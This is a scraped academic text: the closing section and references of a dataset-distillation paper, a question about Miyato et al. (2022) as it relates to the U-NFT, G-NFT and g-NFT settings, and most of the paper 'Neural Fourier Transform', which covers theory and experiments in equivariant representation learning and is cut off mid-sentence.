extremely expensive for large-scale data due to its expert training. However, our method effectively mitigates training costs. The data utility paradigm significantly reduces the training time by at most 60%, while maintaining or enhancing the performance. Our paradigm is especially suitable for large-scale scenarios when the data size increases towards infinite, whose signal-to-noise ratio continues to decrease. Our method can discover the critical samples and dispose of the noise. We will extend to distill even larger datasets in the future. 6 Conclusion This work presents a new perspective on dataset distillation, contributing to the very first principled work on data redundancy in dataset distillation. We model the data utility to identify the sample value, whose efficacy is validated by extensive experiments. Further, we design a baseline to leverage the data utility paradigm which outperforms the current algorithms. With data utility selection, we can efficiently distill larger and more heterogeneous datasets like ImageNet and Kinetics. Our paradigm will bring inspiration and spawn more fruitful work toward efficient dataset distillation. REFERENCES Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. In NeurIPS, 2020. Joao Carreira and Andrew Zisserman. Quo vadis, action recognition? a new model and the kinetics dataset. In CVPR, 2017. Francisco M. Castro, Manuel J. Marin-Jimenez, Nicolas Guil, Cordelia Schmid, and Karteek Alahari. End-to-end incremental learning. In ECCV, 2018. George Cazenavette, Tongzhou Wang, Antonio Torralba, Alexei A Efros, and Jun-Yan Zhu. Dataset distillation by matching training trajectories. In CVPR, 2022. Justin Cui, Ruochen Wang, Si Si, and Cho-Jui Hsieh. Scaling up dataset distillation to imagenet-1k with constant memory. arXiv preprint arXiv:2211.10586, 2022. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In CVPR, 2009. Zhiwei Deng and Olga Russakovsky. Remember the past: Distilling datasets into addressable memories for neural networks. arXiv preprint arXiv:2206.02916, 2022. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 770–778, 2016. Krishnateja Killamsetty, Sivasubramanian Durga, Ganesh Ramakrishnan, Abir De, and Rishabh Iyer. Grad-match: Gradient matching based data subset selection for efficient deep model training. In International Conference on Machine Learning, pp. 5464–5474. PMLR, 2021a. Krishnateja Killamsetty, Durga Sivasubramanian, Ganesh Ramakrishnan, and Rishabh Iyer. Glister: Generalization based data subset selection for efficient and robust learning. In Proceedings of the AAAI Conference on Artificial Intelligence, volume 35, pp. 8110–8118, 2021b. Balhae Kim, Jungwon Choi, Seanie Lee, Yoonho Lee, Jung-Woo Ha, and Juho Lee. On divergence measures for bayesian pseudocoresets. arXiv preprint arXiv:2210.06205, 2022a. Jang-Hyun Kim, Jinuk Kim, Seong Joon Oh, Sangdoo Yun, Hwanjun Song, Joonhyun Jeong, Jung-Woo Ha, and Hyun Oh Song. Dataset condensation via efficient synthetic-data parameterization. In ICML, 2022b. Alex Krizhevsky, Geoffrey Hinton, et al. Learning multiple layers of features from tiny images. 2009. Alex Krizhevsky, Ilya Sutskever, and Geoffrey E Hinton. Imagenet classification with deep convolutional neural networks. Communications of the ACM, 60(6):84–90, 2017. Ya Le and Xuan Yang. Tiny imagenet visual recognition challenge. CS 231N, 7(7):3, 2015. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11):2278–2324, 1998. Hae Beom Lee, Dong Bok Lee, and Sung Ju Hwang. Dataset condensation with latent space knowledge factorization and sharing. arXiv preprint arXiv:2208.10494, 2022. Songhua Liu, Kai Wang, Xingyi Yang, Jingwen Ye, and Xinchao Wang. Dataset distillation via factorization. arXiv preprint arXiv:2210.16774, 2022. Yanqing Liu, Jianyang Gu, Kai Wang, Zheng Zhu, Wei Jiang, and Yang You. Dream: Efficient dataset distillation by representative matching. arXiv preprint arXiv:2302.14416, 2023. Noel Loo, Ramin Hasani, Alexander Amini, and Daniela Rus. Efficient dataset distillation using random feature approximation. arXiv preprint arXiv:2210.12067, 2022.
eOCvA8iwXH
With respect to the work of Miyato et al., (2022) that considers the properties of the learned model to be intra-orbital homogeneity or full equivariance, which of these properties that the proposed model owns in each setting (U-NFT, G-NFT, g-NFT) ?
Neural Fourier Transform: A General Approach to Equivariant Representation Learning Masanori Koyama\textsuperscript{1} Kenji Fukumizu\textsuperscript{2,1} Kohei Hayashi\textsuperscript{1} Takeru Miyato\textsuperscript{3,1} \textsuperscript{1}Preferred Networks, Inc. \textsuperscript{2}The Institute of Statistical Mathematics \textsuperscript{3}University of Tübingen Abstract Symmetry learning has proven to be an effective approach for extracting the hidden structure of data, with the concept of equivariance relation playing the central role. However, most of the current studies are built on architectural theory and corresponding assumptions on the form of data. We propose Neural Fourier Transform (NFT), a general framework of learning the latent linear action of the group without assuming explicit knowledge of how the group acts on data. We present the theoretical foundations of NFT and show that the existence of a linear equivariant feature, which has been assumed ubiquitously in equivariance learning, is equivalent to the existence of a group invariant kernel on the dataspace. We also provide experimental results to demonstrate the application of NFT in typical scenarios with varying levels of knowledge about the acting group. 1 Introduction Various types of data admit symmetric structure explicitly or implicitly, and such symmetry is often formalized with action of a group. As a typical example, an RGB image can be regarded as a function defined on the set of 2D coordinates $\mathbb{R}^2 \rightarrow \mathbb{R}^3$, and this image admits the standard shift and rotation on the coordinates. Data of 3D object/scene accepts SO(3) action (Chen et al., 2021; Yu et al., 2020), and molecular data accepts permutations (Raghunathan and Priyakumar, 2021) as well. To leverage the symmetrical structure for various tasks, equivariant features are used in many applications in hope that such features extract essential information of data. Fourier transform (FT) is one of the most classic tools in science that utilizes an equivariance relation to investigate the symmetry in data. Originally, FT was developed to study the symmetry induced by the shift action $a \circ f(\cdot) := f(\cdot - a)$ on a square-integrable function $f \in L_2(\mathbb{R})$. FT maps $f$ invertibly to another function $\Phi(f) = \hat{f} \in L_2(\mathbb{R})$. It is well known that FT satisfies $(a \circ \hat{f})(\omega) = e^{-ia\omega} \hat{f}(\omega)$ and hence the equivariant relation $\Phi(a \circ f) = e^{ia\omega} \Phi(f)$. By this equivariant mapping, FT achieves the decomposition of $L_2(\mathbb{R})$ into shift-equivariant subspaces (also called frequencies/lrreducible representations). This idea has been extended to the actions of general groups, and extensively studied as harmonic analysis on groups (Rudin, 1991). In recent studies of deep learning, group convolution (GC) is a popular approach to equivariance (Cohen and Welling, 2017; Finzi et al., 2021; Cohen and Welling, 2014, 2016; Weiler and Cesa, 2019), and the theory of FT also provides its mathematical foundation (Kondor and Trivedi, 2018; Cohen et al., 2018, 2019). One practical limitation of FT and GC is that they can be applied only when we know how the group acts on the data. Moreover, FT and GC also assume that the group acts linearly on the constituent unit of input (e.g. pixel). In many cases, however, the group action on the dataset may not be linear or explicit. For example, when the observation process involves an unknown nonlinear deformation such as fisheye transformation, the effect of the action on the observation is also intractable and nonlinear (Fig. 1 left). Another such instance may occur for the 2D pictures of a rotating 3D object rendered with some camera pose (Fig. 1 right). In both examples, any two consecutive frames are implicitly generated as $(x, g \circ x)$, where $g$ is a group action of shift/rotation. They are clearly not linear transformations in the 2D pixel space. To learn the hidden equivariance relation describing the symmetry of data in wider situations, we must extend the equivariance learning and Fourier analysis to the cases in which the group action on each data may be nonlinear or implicit. Figure 1: Left: An image sequence produced by applying fisheye transformation after horizontal shifting. Right: 2D renderings of a spinning chair. Figure 2: NFT framework. Each block corresponds to irreducible representation/frequency. To formally establish a solution to this problem, we propose Neural Fourier Transform (NFT), a nonlinear extension of FT, as a general framework for equivariant representation learning. We generalize the approach explored in (Miyato et al., 2022) and provide a novel theoretical foundation for the nonlinear learning of equivariance. As an extension of FT, the goal of NFT is to express the data space as the direct sum of linear equivariant spaces for nonlinear, analytically intractable actions. Given a dataset consisting of short tuple/sequences \((x_1, x_2, \ldots)\) that are generated by an unknown group action, NFT conducts Fourier analysis that is composed of (i) learning of an equivariant latent feature on which the group action is linear, and (ii) the study of decomposed latent feature as a direct sum of action-equivariant subspaces, which correspond to frequencies. Unlike the previous approaches to equivariance learning that rely on model architectures (Keller and Welling, 2021; Cohen and Welling, 2017), the learning (i) of NFT does not assume any analytically tractable knowledge of the group action in the observation space, and simply uses an autoencoder-type model to infer the actions from the data. In addition to the proposed framework of NFT, we detail our theoretical and empirical contributions as follows. 1. We answer the essential theoretical questions of NFT (Sec 4). In particular, - **Existence.** We elucidate when we can find linear equivariant latent features and hence when we can conduct spectral analysis on a generic dataset. - **Uniqueness.** We show that NFT associates a nonlinear group action with a set of irreducible representations, assuring NFT’s ability to find the unique set of the equivariant subspaces. - **Finite-dimensional approximation.** We show that the autoencoder-type loss chooses a set of irreducible representations in approximating the group action in the observation space. 2. We experimentally show that: - NFT conducts a data-dependent, nonlinear spectral analysis. It can compress the data under nonlinear deformation and favorably extract the dominant modes of symmetry (Sec 5.1). - By using knowledge about the group, NFT can make inferences even when the action is not invertible in the observation space. For example, occlusion can be resolved (Sec 5.2). - By introducing prior knowledge of the irreducible representations, we can improve the out-of-domain (OOD) generalization ability of the features extracted by the encoder (Sec 5.2). 2 Preliminaries In this paper, \(G\) is a group, and \(e\) its unit element. We say \(G\) acts on a set \(X\) if there is a map \(G \times X \rightarrow X\), \((g, x) \mapsto g \circ x\), such that \(e \circ x = x\) and \((gh) \circ x = g \circ (h \circ x)\) for any \(x \in X\) and \(g, h \in G\). When \(G\) acts on \(X\) and \(Y\), a map \(\Phi : X \rightarrow Y\) is called equivariant if \(\Phi(g \circ x) = g \circ \Phi(x)\). for any \( g \in G, x \in X \). A group representation is defined as a linear action of group \( G \) on some vector space \( V \), i.e., a group homomorphism \( \rho : G \to GL(V) \). See also Appendix A for notations. Fourier transform as an equivariant map. We first explain the equivariance of the classic Discrete Fourier Transform (DFT) to motivate the model and learning of NFT. As is well known, DFT on the function space \( L^2_T := \{ f : \mathbb{Z}_T \to \mathbb{C} \} \), where \( \mathbb{Z}_T = \{ j/T \in [0,1) \mid j = 0,\ldots,T-1 \} \) (mod \( T \)) is the \( T \) grid points on the unit interval. DFT and its inverse (IDFT) are given by \[ \hat{f}_k = \frac{1}{\sqrt{T}} \sum_{j=0}^{T-1} e^{-2\pi i \frac{kj}{T}} f(j/T), \quad f(j/T) = \frac{1}{\sqrt{T}} \sum_{k=0}^{T-1} e^{2\pi i \frac{kj}{T}} \hat{f}_k \quad \forall k,j \in \mathbb{Z}_T. \] We can define the group of shifts \( G := \mathbb{Z}_T \) acting on \( f = (f(j/T))_{j=0}^{T-1} \) by \( m \circ f := ((f((j-m)/T))_{j=0}^{T-1} \). With the notation \( \Phi_k(f) := \hat{f}_k \), it is well known that \( \Phi_k(m \circ f) = e^{2\pi i \frac{mk}{T}} \Phi_k(f) \) for all \( m,k \in \mathbb{Z}_T \), establishing DFT \( \Phi \) as an equivariant map; namely \[ \Phi(m \circ f) = D(m)\Phi(f) \quad \text{or} \quad m \circ f = \Phi^{-1}(D(m)\Phi(f)), \] where \( D(m) := \text{Diag}(e^{2\pi i \frac{mk}{T}})_{k=0}^{T-1} \) is a diagonal matrix. By definition, \( D(m) \) satisfies \( D(m+m') = D(m)D(m') \), meaning that \( G \ni m \mapsto D(m) \in GL(\mathbb{C}^T) \) is a group representation. Thus, the DFT map \( \Phi \) is an equivariant linear encoding of \( L^2_T \) into the direct sum of eigen spaces (or the spaces that are invariant with respect to the shift actions), and \( \Phi^{-1} \) is the corresponding linear decoder. In group representation theory, the diagonal element \( e^{2\pi i \frac{mk}{T}} \) of \( D(m) \) is known as an irreducible representation, which is a general notion of frequency. We shall therefore use the word frequency and the word irreducible representation interchangeably in this paper. A group representation of many groups can be decomposed into a direct sum of irreducible representations, or the finest unit of group invariant vector spaces. Generally, for a locally compact group \( G \), the Fourier transform, the inversion formula, and the frequencies are all analogously defined (Rudin [1991]). For the group action \( (g \circ f)(x) = f(g^{-1}x) \), an equivariant formula analogous to eq.(2) also holds with \( D(g) \) being a block diagonal matrix. Thus, the frequencies are not necessarily scalar-valued, but matrix-valued. 3 NEURAL FOURIER TRANSFORM In NFT, we assume that a group \( G \) acts on a generic set \( X \), and examples of \( (x,g \circ x) \) (\( x \in X, g \in G \)) can be observed as data. However, we do not know how the action \( \circ \) is given in \( X \), and the action can only be inferred from the data tuples. As in FT, the basic framework of NFT involves an encoder and a decoder, which are to be learned from a dataset to best satisfy the relations analogous to eq.(2): \[ \Phi(g \circ x) = M(g)\Phi(x) \quad \text{and} \quad \Psi(\Phi(x)) = x \quad (\forall x \in X, \forall g \in G), \] where \( M(g) \) is some linear map dependent on \( g \), which might be either known or unknown. It turns out that realizing eq.(3) is enough to guarantee that \( M(g) \) is a group representation: **Lemma 3.1.** If \( \text{span}\{\Phi(X)\} \) is equal to the entire latent space, then eq.(3) implies that \( M(g) \) is a group representation, that is, \( M(e) = \text{Id} \) and \( M(gh) = M(g)M(h) \). The proof is given in Appendix B. The encoder \( \Phi \) and decoder \( \Psi \) may be chosen without any restrictions on the architecture. In fact, we will experiment NFT with MLP/CNN/Transformer whose architectures have no relation to the ground truth action. Given a pair \( (\Phi, \Psi) \) that satisfies eq.(3), we also seek an invertible linear map \( P \) to block-diagonalize \( M(g) \) unless we know \( M(g) \) a priori in a block-diagonal form. This corresponds to irreducible decomposition in representation theory. Assuming that the representation is completely reducible, we can seek a common change of basis matrix \( P \) for which \( B(g) = PM(g)P^{-1} \) is block-diagonal for every \( g \) so that each block corresponds to an irreducible component of \( M(g) \). See Sec.A for the details on irreducible decomposition. Putting all together, NFT establishes the relation \[ g \circ x = \Psi(P^{-1}B(g)P\Phi(x)). \] We call the framework consisting of eqs.(3) and (4) Neural Fourier Transform (NFT), where \( z = P\Phi(x) \) is the Fourier image of \( x \), and \( \Psi(P^{-1}z) \) is the inverse Fourier image. See also Fig.2 for the visualization of the NFT framework. The classic DFT described in Sec.2 is an instance of NFT; \( X \) is \( \mathbb{R}^T \), which is the function space on \( G = \mathbb{Z}_T \) with shift actions, and \( P\Phi \) and \( \Psi P^{-1} \) are respectively DFT and IDFT (linear). (Miyato et al. [2022]) emerges as an implementation of NFT when \( (\Phi, \Psi) \) is to be learned in a completely unsupervised manner with no prior knowledge of \( M(g) \) nor \( G \) itself. As we show next, however, NFT can be conducted in other situations as well. 3.1 Three Typical Scenarios of NFT There can be various settings of data and prior knowledge of $G$, and accordingly various methods for obtaining a pair $(\Phi, \Psi)$ in eq.(3). However, we at least need a dataset consisting of tuples of observations (e.g., $(x, g \circ x)$) from which we need to infer the effect of group action. A common strategy is to optimize $\mathbb{E}[||g \circ X - \Psi(M(g)\Phi(X))||^2]$ where $M(g)$ is either estimated or provided, depending on the level of prior knowledge on $g$ or $G$. **Unsupervised NFT (U-NFT): Neither $G$ nor $g$ is known.** In U-NFT, the dataset consists of tuples of observations $\{x^{(i)} := (x_0^{(i)}, \ldots, x_T^{(i)})\}_{i=1}^N$, where each $x_t^{(i)}$ is implicitly generated as $x_t^{(i)} = g_t^i \circ x_0^{(i)}$ for some unobserved $g_i$ sampled from $G$ that is unknown. Such a dataset may be obtained by collecting short consecutive frames of movies/time-series, for example. (Miyato et al., 2022) is a method for U-NFT. MSP uses a dataset consisting of consecutive triplets ($T = 2$), such as any consecutive triplet of images in Fig[1]. Given such a dataset, MSP trains $(\Phi, \Psi)$ by minimizing $$\mathbb{E}[||x_2 - \Psi(M^*(\Phi(x_1)))||^2], \quad \text{where } M^* = \arg\min_M ||\Phi(x_1) - M\Phi(x_0)||^2$$ (5) is computed for each triplet $x$ (Fig[20], Appendix). By considering $\Phi$ with matrix output of dimension $\mathbb{R}^{a \times m}$, $M^* \in \mathbb{R}^{a \times a}$ can be analytically solved as $\Phi(x_1)\Phi(x_0)^{\dagger}$ where $A^{\dagger}$ is the Moore Penrose inverse of $A$ (Inner optimization part). Thus, $(\Phi, \Psi)$ is trained in an end-to-end manner by minimizing $E[||x_2 - \Psi(\Phi(x_1)\Phi(x_0)^{\dagger}\Phi(x_1))||^2]$. For the U-NFT experiments, we used MSP as a method of choice. After training $(\Phi, \Psi)$, we may obtain $M^*$ for each $x^{(i)}$ (say $M_i^*$), and use (Maehara and Murota, 2011) for example to search for $P$ that simultaneously diagonalizes all $M_i^*$s. **G-supervised NFT (G-NFT): $G$ is known but not $g$.** G-NFT has the same dataset assumption as U-NFT, but the user is allowed to know the group $G$ from which each $g_i$ is sampled. In this case, we can assume that the matrix $M(g)$ in the latent space would be a direct sum of irreducible representations of $G$. For example, we may assume some parametric form of irreducible representations $M(\theta) = \oplus_k M_k(\theta)$ and estimate $\theta^{(i)}$ for every tuple of data $x^{(i)}$. However, estimating $\theta^{(i)}$ for each $i$ may not scale for a large dataset. Alternatively, we may just use the dimensional information of the matrix decomposition and estimate each block in the same manner as U-NFT. For instance, in the context of Fig[1], the user may know that the transformation between consecutive frames is “some” periodic action (cyclic shift), for which it is guaranteed that the matrix representation is a direct sum of $2 \times 2$ matrices. When $T = 2$, we can minimize the same prediction loss as in eq.(5) except that we put $M^* = \oplus_k M_k^* \in \mathbb{R}^{a \times a}$ where $M_k^* = \arg\min_M ||\Phi_k(x_1) - M\Phi_k(x_0)||^2 \in \mathbb{R}^{2 \times 2}$ and $\Phi_k$s are the matrices constituting $\Phi$ by vertical concatenation $\Phi = [\Phi_1; \Phi_2; ...]$. **g-supervised NFT (g-NFT): $g$ is known.** In g-NFT, the user can observe a set of $(x, g \circ x)$ for known $g$ so that the data technically consists of $(x, g \circ x, g)$. In the context of Fig[1], the g-NFT setting not only allows the user to know that $g$ is periodic, but also the velocity of the shift (e.g., the size of the pixel-level shift before applying the fisheye transform). Thus, by deciding the irreducible representations to use in our approximation of the action, we can predetermine the explicit form of $M(g)$. For g-NFT, we may train $(\Phi, \Psi)$ by minimizing $$E[||g \circ x - \Psi(M(g)\Phi(x))||^2] + E[||\Phi(g \circ x) - M(g)\Phi(x)||^2].$$ The matrix $M(g)$ can be derived from the knowledge of representation theory. For example, if $Z_N$ is the group, $M(g)$ corresponding to the frequencies $\{f_1, ..., f_n\}$ would be the direct sum of the 2D rotation matrices by angle $2\pi f_k g/N$ (see also Fig[21] in Appendix). 3.2 Properties of NFT By realizing eq.(3) approximately, NFT learns spectral information from the data and actions (Lemma[3.1]). Here, we emphasize three practically important properties of NFT. First, by virtue of the nonlinear encoder and decoder, NFT achieves nonlinear spectral analysis for arbitrary data types. Second, NFT performs data-dependent spectral analysis; it provides decomposed representations only through the frequencies necessary to describe the symmetry in the data. These two properties contrast with the standard FT, where the pre-fixed frequencies are used for expanding functions. Third, the NFT framework has the flexibility to include spectral knowledge about the group in the latent space, as in G-NFT and g-NFT. This further enables us to extract effective features for various tasks. These points will be verified through theory and experiments in the sequel. 4 THEORY Existence and uniqueness: Because the goal of NFT is to express the data space in the form of latent linear equivariant subspaces, it is a fundamental question to answer whether this goal is achievable theoretically. Additionally, it is important to ask if the linear action can be expressed by a unique set of irreducible representations. The following Thm 4.1 answers these questions in the affirmative using the notion of group invariant kernel. Let group $G$ act on the space $\mathcal{X}$. A positive definite kernel $k : \mathcal{X} \times \mathcal{X} \rightarrow \mathbb{R}$ is called $G$-invariant if $k(g \circ x, g \circ x') = k(x, x')$ for any $x, x' \in \mathcal{X}$ and $g \in G$. **Theorem 4.1.** (Existence, uniqueness, and invariant kernel) Let $G$ be a compact group acting on $\mathcal{X}$. There exists a vector space $V$ and a non-trivial equivariant map $\Phi : \mathcal{X} \rightarrow V$ if and only if there exists a non-trivial $G$-invariant kernel on $\mathcal{X}$. Moreover, the set of $G$-invariant kernels and the set of equivariant maps to a vector space are in one-to-one correspondence up to a $G$-isomorphism. We provide the proof in Appendix C. The implication of Thm 4.1 is twofold. First, Thm 4.1 guarantees the existence of an equivariant map $\Phi$ by the existence of an invariant kernel. In the proof, $\Phi$ emerges as an embedding into the associated reproducing kernel Hilbert space (RKHS). Thus, under mild conditions, there is a latent space that is capable of linearly representing a sufficiently rich group action, since one can easily construct a $G$-invariant kernel with infinite-dimensional RKHS which is dense in $L^2$ space (Thm C.1.1). Second, Thm 4.1 implies the identifiability. When there are two invertible equivariant maps $\Phi$ and $\tilde{\Phi}$, Thm 4.1 guarantees that there is a pair of corresponding kernels, and we can induce from them a $G$-isomorphism (Sec A) between the corresponding RKHSs. In other words, $\Phi$ and $\tilde{\Phi}$ are connected via $G$-isomorphism, corresponding to the same set of irreducible representations. This way, we may associate any linearizable group action to a unique set of irreducible representations. Similarly, any two solutions for the g-NFT with the similar $M(g)$s would also differ only by $G$-isomorphism. Finite dimensional Approximation: When the output dimension of $\Phi$ is small, the space may not fit all members of irreducible representations corresponding to the target group action and it may not be possible to invertibly encode the action and observations as done in the standard FT. In such a case, the expression $x_1 \rightarrow \Psi(M(g)\Phi(x_1))$ in NFT would only provide an approximation of the transition $x_1 \rightarrow x_2$. However, what type of approximation would it be in U-NFT and G-NFT? Below we will present the claim guaranteeing that NFT conducts a data-dependent filter that selectively extracts the dominant spectral information in the dataset describing the action. We present an informal statement here (see Sec C.3.2 for the formal version). **Theorem 4.2.** (Nonlinear Fourier Filter) Suppose that there exists an invariant kernel $k$ for the group action on $\mathcal{X}$ whose RKHS is large enough to invertibly encode $\mathcal{X}$. Suppose further that $(\Phi^*, \Psi^*)$ is the minimizer of $$\mathbb{E}_{g \in G}[\|g \circ X - \Psi \Phi(g \circ X)\|^2]$$ among the set of all equivariant autoencoders of a fixed latent dimension for which the actions are linear in the latent space. Then the frequencies to appear in the latent space of $\Phi^*$ are determined by the signal strength of each irreducible component in the RKHS of $k$. This result claims that, in the application of NFT with small latent dimension, U-NFT and G-NFT automatically select the set of irreducible representations that are dominant in describing the action in the observation space, functioning as a data-dependent nonlinear filter on the dataset. Please also see Sec C for the theory of NFT. As we will validate experimentally in Sec 5.1, NFT does choose the major frequencies discretely even in the presence of noise frequencies. 5 EXPERIMENTS 5.1 NFT vs DFT To verify that NFT performs nonlinear spectral analysis, we conduct experiments on 1D time series with time-warped shifts. We first prepared a fixed or random set of frequencies $F$ and constructed $$Z_N \ni t \mapsto \ell(t) = \sum_{k=1}^{K} c_k \cos(2\pi f_k(t/N)^3) := r((t/N)^3), \quad F = \{f_1, f_2, ..., f_K\},$$ which is the time-warped version of the series \( r(\cdot) = \sum_{k=1}^{K} c_k \cos(2\pi f_k \cdot / N) \). The shift \( m \in \mathbb{Z}_N \) acts on the latent space as \( \ell(\cdot) \) by \((m \circ \ell)(t) = r((t/N)^3 - m/N)\). We used \( N = 128 \). Note that the frequency spectrum obtained by the classical DFT does not reflect the true symmetry structure defined with \( F \) (Fig 3). Codes are in supplementary material, details are in Appendix D. **Spectral analysis of time-warped signals.** In this experiment, we verify that NFT recovers the fixed frequencies \( F \) from the time-warped signals. We generated 30000 sets of \( \{c_1, ..., c_K\} \) with \( K = 7 \), yielding 30000 instances of \( \ell \) as dataset \( X \subset \mathbb{R}^{128} \). The \( c_k \)'s were sampled from the uniform distribution, and \( c_5, c_6 \) scaled by the factor of 0.1 to produce two noise frequencies. See Fig 4 for visualization. To train NFT, we prepared a set of sequences of length-3 \( s = (\ell_0, \ell_1, \ell_2) \) with \( \ell_k = r((t/N)^3 - kv_k/N) \in \mathbb{R}^{128} \) shifting with random velocity \( v_k \). We then conducted U-NFT as in Sec 3.1 with latent dimension \( \mathbb{R}^{10 \times 16} \) so that for each sequence \( s \), the matrix \( M_* \in \mathbb{R}^{10 \times 10} \) provides \( \ell_t \approx \Psi(M_*^t \Phi(\ell_0)) \). With this setting, \( \Phi \) can express at most \( 10/2 = 5 \) frequencies. To check whether the frequencies \( F \) obtained by NFT are correct, we use the result from the representation theory stating that, if \( \rho_f : \mathbb{Z}_N \to \mathbb{R}^{d_f \times d_f} \) is the irreducible representation corresponding to the frequency \( f \), the character inner product (Fulton and Harris [1991]) satisfies \[ \langle \rho_f | \rho_{f'} \rangle = \frac{1}{N} \sum_{g \in \mathbb{Z}_N} \text{trace}(\rho_f(g)) \text{trace}(\rho_{f'}(g)) = \delta_{ff'} \] \( (\delta_{ff'} \) is Kronecker’s delta). We can thus validate the frequencies captured in the simultaneously block-diagonalized \( M_* \)'s by taking the character inner product of each identified block \( B_i \) with the known frequencies. The center plot in Fig 5 is the graph of \( \mathbb{E}[\langle \rho_f | B_i \rangle] \) plotted against \( f \). We see that the spike only occurs at the major frequencies in \( F \) (i.e. \( \{8, 15, 22, 40, 45\} \)), indicating that our NFT successfully captures the major symmetry modes hidden in the dataset without any supervision. When we repeated this experiment with 100 instances of randomly sampled \( F \) of the same size, NFT was able to recover the major members of \( F \) with \( \langle FN, FP \rangle = (0.035, 0.022) \) by thresholding \( \mathbb{E}[\langle \rho_f | M_* \rangle] \) at 0.5. This score did not change much even when we reduced the number of samples to 5000 (0.04, 0.028). This experimental result also validates that the disentangled features reported in [Miyato et al., 2022] are in fact the set of major frequencies in the sense of classical DFT. We can also confirm that underlying symmetry can be recovered even when the deformation is applied to 2D images (Fig 6). ![Figure 4](image-url) **Data compression with NFT.** In signal processing, FT is also used as a tool to compress data based on the shift-equivariance structure of signals. We generated 5000 instances of the time-warped signals with \( F \subset \{0 : 16\} \), and applied U-, G-, and g-NFT to compress the dataset using encoder output of dimension \( \mathbb{R}^{32 \times 1} \). We also added an independent Gaussian noise at each time point in the training signals. As for G-NFT, we used the direct sum of 16 commutative \( 2 \times 2 \) matrices of form \( ((a, -b), (b, a)) \) to parameterize \( M \). For g-NFT, we used the \( 2 \times 2 \) block diagonal matrix \( M(\theta) = \bigoplus_{\ell=0}^{15} \begin{pmatrix} \cos \ell \theta & -\sin \ell \theta \\ \sin \ell \theta & \cos \ell \theta \end{pmatrix} \) with known \( \theta \). We evaluated the reconstruction losses of these NFT variants on the test signals and compared them against DFT over frequencies of range \( \{0 : 16\} \) (Fig 12, Appendix). The mean squared errors together with standard deviations in parentheses are shown in Table 1, which clearly demonstrates that NFT learns the nonlinearity of observation and compresses the data appropriately according to the hidden frequencies. It is also reasonable that g-NFT, which uses the identity of group element \( g \) --- 1When the scalar field is \( \mathbb{R} \), \( 2 \times 2 \) would be the smallest irreducible representation instead of \( 1 \times 1 \) in complex numbers. Figure 5: Left: Long horizon future prediction of the sequence of time-warped signals. Center: $\mathbb{E}[\langle \rho_f | B \rangle]$ plotted against $f \in [0, 64]$ for each block $B$ in the block diagonalized $M_s$ learned from the dataset with 5 major frequencies ($\{8, 15, 22, 40, 45\}$) and 2 noise frequencies with small coefficients ($\{18, 43\}$) when $M_s$ can express at most 5 frequencies. Note that $\mathbb{E}[\langle \rho_f | M_s \rangle]$ is linear with respect to $M^*$ (Appendix A.3). Right: Average absolute value of block-diagonalized $M_s$s. Figure 6: Horizontal shift of unseen objects in fisheye-view predicted from the left-most frame by U-NFT trained on CIFAR100 (Krizhevsky et al., 2009) sequences with $T = 4$. (top: pred, bottom: gt). U-NFT learns the deformed shifts that are not expressible as linear functions on input coordinates. acting on each signal, achieves more accurate compression than G-NFT. DFT fails to compress the data effectively, which is obvious from Fig 3. 5.2 Application to Images We verify the representation ability of NFT by applying it to challenging tasks which involve out-of-domain (OOD) generalization and recovery of occlusion. Codes are in supplementary material. Rotated MNIST. We applied g-NFT to MNIST (LeCun et al., 1998) dataset with SO(2) rotation action and used it as a tool in unsupervised representation learning for OOD generalization. To this end, we trained $(\Phi, \Psi)$ on the in-domain dataset (rotated MNIST), and applied logistic regression on the output of $\Phi$ for the downstream task of classification on the rotated MNIST (in-domain) as well as on rotated Fashion-MNIST (Xiao et al., 2017) and rotated Kuzushiji-MNIST (Clanuwat et al., 2018) (two out-domains). Following the standard procedure as in (Chen et al., 2020), we trained the regression classifier for the downstream task with fixed $\Phi$. We used data consisting of triplets $(g_\theta \circ x, g_{\theta'} \circ x, \theta' - \theta)$ with $x$ being a digit image and $\theta, \theta' \sim \text{Uniform}(0, 2\pi)$ being random rotation angles. We used the same transition matrix $M(\theta)$ used in the data compression experiment (Sec 5.1) with the max frequency $l_{\max} = 2$ plus one-dimensional trivial representation. Details are in Appendix D. Because the representation learned with NFT is decomposed into frequencies, we can make a feature by taking the absolute value of each frequency component; that is, by interpreting the latent variable $\mathbb{R}^{(2l_{\max}+1) \times d_m}$ as $l_{\max} + 1$ frequencies of $d_m$ multiplicity each (trivial representation is 1-dim), we may take the norm of each frequency component to produce $(l_{\max} + 1) \times d_m$-dimensional feature. This is analogous to taking the absolute value of each coefficient in DFT. We designate this approach as norm in Fig 7. As we can see in the right panel of Fig 7, both g-NFT and g-NFT-norm perform competitively compared to conventional methods. In particular, g-NFT norm consistently eclipses all competitors on OOD. In the left panel, although a larger $l_{\max}$ generally benefits the OOD performance, too large a value of $l_{\max}$ seems to result in overfit, just like in the analysis of FT. We also compared NFT against SteerableCNN (Cohen and Welling, 2017), which assumes that acting $G$ is a rotation group. We gave SteerableCNN a competitive advantage by training the model with classification labels on rotMNIST, and fine-tuned the final logit layer on all three datasets, consisting of the in-domain dataset (rotMNIST) and two OOD datasets (rotFMNIST, rotKuzushiji-MNIST). SteerableCNN with supervision outperforms all our baselines in the in-domain dataset, but not on the OOD datasets. We believe that this is because, as pointed out in (Cohen et al., 2018), SteerableCNN functions as a | | g-NFT | G-NFT | DFT ($N_f = 16$) | |----------|------------------------|------------------------|-----------------| | Noiseless| $3.59 \pm 1.29 \times 10^{-5}$ | $1.98 \pm 1.89 \times 10^{-2}$ | 8.10 | | $\sigma = 0.01$ | $2.62 \pm 0.26 \times 10^{-4}$ | $2.42 \pm 1.19 \times 10^{-2}$ | – | | $\sigma = 0.05$ | $1.42 \pm 0.14 \times 10^{-3}$ | $5.82 \pm 1.15 \times 10^{-2}$ | – | | $\sigma = 0.1$ | $2.53 \pm 0.09 \times 10^{-3}$ | $1.16 \pm 0.22 \times 10^{-1}$ | – | Table 1: Reconstruction error of data compression for time-warped 1d signals Figure 7: OOD generalization ability of NFT trained on rotMNIST. Top Left: Prediction by 